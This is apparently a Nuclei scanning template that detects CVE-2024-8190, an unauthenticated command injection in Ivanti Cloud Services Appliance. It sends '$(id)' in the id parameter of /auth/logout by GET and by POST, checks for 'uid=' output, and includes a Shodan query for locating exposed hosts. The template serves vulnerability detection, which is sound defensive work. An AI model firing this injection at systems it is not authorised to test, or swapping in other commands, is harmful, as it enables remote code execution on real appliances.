CVE-2024-8190 (Ivanti Command Injection)

Detect potentially vulnerable hosts using the Ivanti-CSA-Detect template

id: CVE-2024-8190

info:
  name: Ivanti CSA Command Injection (CVE-2024-8190)
  author: Redflare-Cyber
  severity: critical
  description: Detects unauthenticated command injection vulnerability in Ivanti CSA (CVE-2024-8190) using both GET and POST methods.
  classification:
    cwe-id: CWE-78
  metadata:
    shodan-query: http.html:'Ivanti(R) Cloud Services Appliance'
  reference:
    - https://www.horizon3.ai/attack-research/cisa-kev-cve-2024-8190-ivanti-csa-command-injection/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8190
    - https://github.com/horizon3ai/CVE-2024-8190
  tags: cve, rce, command-injection, ivanti, csa

http:
  # First request using GET method
  - method: GET
    path:
      - "{{BaseURL}}/auth/logout?id=$(id)"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body
    # Stop execution if the vulnerability is found using GET
    stop-at-first-match: true

  # Second request using POST method
  - method: POST
    path:
      - "{{BaseURL}}/auth/logout"
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    body: "id=$(id)"
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body

Last updated